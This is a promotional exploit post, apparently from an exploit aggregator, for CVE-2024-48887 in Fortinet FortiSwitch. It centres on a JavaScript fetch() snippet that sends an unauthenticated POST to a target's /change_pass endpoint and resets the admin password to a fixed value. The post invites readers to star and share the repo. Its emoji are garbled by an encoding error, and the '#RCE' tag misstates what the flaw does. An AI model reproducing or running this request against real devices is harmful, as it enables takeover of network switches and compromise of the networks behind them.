Share
## https://sploitus.com/exploit?id=C23EF151-F6BE-5DBE-86B3-0CE8C1AF3F3B
# CVE-2024-48887-FortiSwitch-Exploit
๐จ FortiSwitch CVE-2024-48887 PoC (JavaScript) ๐จ
๐ฅ Just dropped a lightweight JavaScript snippet showcasing how unauthorized password changes can be triggered on vulnerable Fortinet FortiSwitch GUI endpoints.
๐ ๏ธ About the Vulnerability:
An attacker can craft a simple fetch() request to manipulate password settings without any auth, directly targeting /change_pass endpoint variants.
```
fetch('http://target-ip/change_pass', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: 'admin',
newpass: 'pwned123',
confirm: 'pwned123'
})
})
.then(res => res.text())
.then(data => console.log('Response:', data));
```
๐ก Impact: Full switch takeover, lateral movement potential, and network compromise.
๐ Repo: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit
โญ Star the repo & share it with your infosec folks!
๐ข Follow the full breakdown and real-time alerts via @cybersecplayground
#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground